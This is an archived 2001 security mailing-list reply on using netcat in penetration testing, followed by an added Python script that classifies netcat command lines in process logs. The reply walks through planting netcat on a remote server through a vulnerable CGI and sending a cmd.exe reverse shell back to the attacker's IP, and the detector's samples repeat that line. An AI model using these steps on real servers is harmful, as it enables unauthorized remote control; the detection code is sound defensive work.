Re: Ideas on netcat

From: Forrest Rae
Date: Tue Aug 28 2001 - 08:47:54 PDT

    Hi Kartik,
    One use is sending a shell back to yourself.
    First, upload netcat to a remote server, via unicode, a vulnerable cgi,
    or various other methods.  Second, on your local computer run netcat in
    listen mode.
    $ netcat -l -p 8888
    Third, execute netcat on remote server such that it sends a connection
    back to you.  This is assuming that you can execute programs on the
    remote server.  If X is installed on the remote server you can send back an
    xterm or rxvt, which is a little less complicated.  This command may
    not be 100% correct, I am in a bit of a rush right now, I apologize.
    netcat -d -e cmd.exe X.X.X.X 8888	(X.X.X.X is your IP)
    The netcat listener you set up should display something like this:
    XiXrXsXft XiXdoXs XXXX [Version X.XX.XXXX]
    (X) CXpXrXgXt 1985-1900 XiXrXsXft CXrX.
    This method can vary in several ways.  Instead of sending a connection back
    to your local computer, you can also set up a listener on the remote
    server, assuming the remote server isn't firewalled.
    I am also interested in other ways people use netcat in pen testing.
    Would anyone else care to share?
    Vo0d0o wrote:
    > I would be grateful if anybody could throw some light on uses of netcat in 
    > pen-testing.
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:

    This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 11:55:50 PDT
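
From the defending side, the two command lines in the message above are recognisable in process-creation logs. The following is an added example, not part of the original post: a small classifier for netcat command lines, where the binary names, the sample log lines and the 192.0.2.10 address are constructed assumptions.

```python
import shlex
from pathlib import PureWindowsPath

NETCAT_NAMES = {"nc", "netcat"}   # assumed names; a renamed copy needs hash matching instead
VALUE_FLAGS = set("egGiopsw")     # traditional netcat options that take an argument

def parse_netcat(cmdline):
    """Split a command line into (flags, positionals); None if it is not netcat."""
    argv = shlex.split(cmdline, posix=False)   # posix=False keeps Windows backslashes
    if not argv or PureWindowsPath(argv[0].strip('"')).stem.lower() not in NETCAT_NAMES:
        return None
    flags, positional, i = {}, [], 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-") and len(arg) > 1:
            for pos, ch in enumerate(arg[1:], start=1):   # handles bundles such as -de
                if ch in VALUE_FLAGS:
                    rest = arg[pos + 1:]                  # value glued on, e.g. -p8888
                    if not rest and i + 1 < len(argv):
                        i, rest = i + 1, argv[i + 1]      # value is the next token
                    flags[ch] = rest
                    break
                flags[ch] = True
        else:
            positional.append(arg)
        i += 1
    return flags, positional

def classify(cmdline):
    """Label a netcat command line: exec-connect, exec-listen, listen or connect."""
    parsed = parse_netcat(cmdline)
    if parsed is None:
        return None
    flags, positional = parsed
    listening = "l" in flags or "L" in flags
    peer = None if listening or not positional else positional[0]
    port = flags.get("p") if listening else (positional[1] if len(positional) > 1 else None)
    kind = ("exec-" if "e" in flags else "") + ("listen" if listening else "connect")
    return {"kind": kind, "program": flags.get("e"), "peer": peer, "port": port}

# Constructed process-creation command lines, modelled on the two commands in the post.
SAMPLES = [
    "netcat -l -p 8888",
    r"C:\temp\nc.exe -d -e cmd.exe 192.0.2.10 8888",
    "notepad.exe notes.txt",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

The `exec-*` kinds, where netcat is started with a program attached to the socket, are the ones worth alerting on; plain `listen` and `connect` also occur in routine administration.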